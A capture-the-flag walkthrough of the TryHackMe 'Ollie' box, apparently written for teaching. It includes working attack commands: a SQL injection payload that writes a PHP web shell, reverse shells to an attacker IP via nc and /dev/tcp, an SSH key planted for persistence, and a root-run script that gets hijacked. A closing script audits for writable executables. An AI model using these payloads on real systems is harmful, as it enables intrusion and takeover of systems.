
Ollie (SQLI, Permission)

First, we enumerate the target with nmap.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie  
╰─➤  nmap -A 10.10.20.38 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-16 14:50 +0630
Nmap scan report for 10.10.20.38
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/ /immaolllieeboyyy
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Ollie :: login
|_Requested resource was http://10.10.20.38/index.php?page=login
|_https-redirect: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.78 seconds

Rustscan shows all the open ports, including 1337/tcp, which the default nmap scan missed.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie  
╰─➤  rustscan -a 10.10.20.38 | tee rust.log

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
1337/tcp open  waste   syn-ack

Answering the quiz served on port 1337 yields a set of credentials.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie  
╰─➤  nc 10.10.20.38 1337
Hey stranger, I'm Ollie, protector of panels, lover of deer antlers.

What is your name? mrhnl
What's up, Mrhnl! It's been a while. What are you here for? getsystem
Ya' know what? Mrhnl. If you can answer a question about me, I might have something for you.


What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? duck
You are wrong! I'm sorry, but this is serious business. Let's try again...


What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? wolf
You are wrong! I'm sorry, but this is serious business. Let's try again...


What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? Bulldog
You are correct! Let me confer with my trusted colleagues; Benny, Baxter and Connie...
Please hold on a minute
Ok, I'm back.
After a lengthy discussion, we've come to the conclusion that you are the right person for the job.Here are the credentials for our administration panel.

                    Username: admin

                    Password: OllieUnixMontgomery!

PS: Good luck and next time bring some treats!

Logging in with these credentials at http://10.10.20.38 succeeds.

We then land on the admin dashboard.

The proof of concept comes from this advisory: https://fluidattacks.com/advisories/mercury/. The SQL injection can be used to read out the Ubuntu version.

Check whether the database users have the FILE privilege (file_priv). Every entry comes back as Y.

" union all select 1,2,3,group_concat(user,0x3a,file_priv) from mysql.user -- -

Write a PHP web shell to the web root with INTO OUTFILE. The query returns an error, but the file is still written.

" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/rev.php' -- -

Check whether the remote code execution works:

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie  
╰─➤  curl http://10.10.20.38/rev.php\?cmd\=whoami
1	 www-data
 	3	4

Get a reverse shell from the target using a mkfifo netcat pipe.

curl http://10.10.20.38/rev.php\?cmd\=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.9.0.180%209001%20%3E%2Ftmp%2Ff

In the netcat listener, we get a reverse shell as www-data.

user.txt is in /home/ollie, but www-data is not allowed to read it:

$ cat user.txt
cat: user.txt: Permission denied

We can switch to the ollie user with the password obtained from the port 1337 service.

$ su ollie
Password: OllieUnixMontgomery!

whoami
ollie

For a stable shell, we generate an SSH key pair and add the public key to ollie's authorized_keys on the target.

echo "ssh-rsa <public key> hnl@hnl" > /home/ollie/.ssh/authorized_keys

Log in over SSH with the private key.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ollie  
╰─➤  ssh -i /home/hnl/.ssh/id_rsa ollie@10.10.20.38
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-99-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 16 Apr 2022 09:45:56 AM UTC

  System load:  0.45              Processes:                141
  Usage of /:   64.4% of 9.78GB   Users logged in:          0
  Memory usage: 45%               IPv4 address for docker0: 172.17.0.1
  Swap usage:   0%                IPv4 address for eth0:    10.10.20.38


6 updates can be applied immediately.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Feb 12 15:57:44 2022
ollie@hackerdog:~$ 

Nothing stands out, so we upload pspy64 and linpeas to look for privilege-escalation paths.

wget http://10.9.0.180:1234/linpeas

pspy shows a suspicious process that runs as root (UID=0): feedme.

2022/04/16 10:00:00 CMD: UID=0    PID=73809  | /lib/systemd/systemd-udevd 
2022/04/16 10:00:00 CMD: UID=0    PID=73808  | /lib/systemd/systemd-udevd 
2022/04/16 10:00:39 CMD: UID=0    PID=73812  | ps -e -o pid,ppid,state,command 
2022/04/16 10:01:01 CMD: UID=0    PID=73814  | /lib/systemd/systemd-udevd 
2022/04/16 10:01:01 CMD: UID=0    PID=73813  | (feedme) 
2022/04/16 10:01:01 CMD: UID=0    PID=73824  | /lib/systemd/systemd-udevd 
2022/04/16 10:01:01 CMD: UID=0    PID=73823  | /lib/systemd/systemd-udevd

Locate the file:

ollie@hackerdog:/tmp$ find / -type f -name feedme 2>/dev/null
/usr/bin/feedme
ollie@hackerdog:/tmp$ cat /usr/bin/feedme
#!/bin/bash

# This is weird?

Who owns this file?

ollie@hackerdog:/tmp$ ls -lisha /usr/bin/feedme
10256 4.0K -rwxrw-r-- 1 root ollie 30 Feb 12 02:31 /usr/bin/feedme

The script is owned by root but writable by the ollie group, so we can append a command to it:

ollie@hackerdog:/tmp$ echo "bash -i >& /dev/tcp/10.9.0.180/9002 0>&1" >> /usr/bin/feedme
ollie@hackerdog:/tmp$ cat /usr/bin/feedme 
#!/bin/bash

# This is weird?
bash -i >& /dev/tcp/10.9.0.180/9002 0>&1

In the netcat listener, we get a reverse shell running as root.
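The privilege escalation above works because a script that root runs periodically is writable by the unprivileged ollie group. As an added example, not part of the original writeup, the following hypothetical shell function audits a directory for exactly that weakness: executables owned by a given user that group or others can modify. On a real host you would pass root as the owner; taking the owner as a parameter is an assumption of this example so it can be exercised on files owned by whoever runs it.

```shell
#!/bin/sh
# Added example (not from the original writeup): list executables under a
# directory that are owned by OWNER but writable by group or others, i.e.
# files an unprivileged user could modify before a privileged process runs them.
# The OWNER parameter is a hypothetical convenience; on a real host use "root".
find_writable_execs() {
  dir="$1"     # directory to scan, e.g. /usr/bin or /etc/cron.d
  owner="$2"   # expected owner of the files, e.g. root
  # Regular files owned by $owner that have any execute bit set
  # and are writable by group or by others (portable symbolic -perm forms).
  find "$dir" -type f -user "$owner" \
    \( -perm -u+x -o -perm -g+x -o -perm -o+x \) \
    \( -perm -g+w -o -perm -o+w \) 2>/dev/null | sort
}

# Print the offending files in ls -l form so the mode bits and owning
# group are visible, as they were for /usr/bin/feedme above.
report_writable_execs() {
  find_writable_execs "$1" "$2" | while IFS= read -r f; do
    ls -l "$f"
  done
}

# Usage on a live host (commented out so the file runs stand-alone):
# report_writable_execs /usr/bin root
```

A file flagged by this check should be fixed with `chown root:root` and `chmod 755` (or stricter), and anything root executes from cron or a timer should live in a directory that only root can write to.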
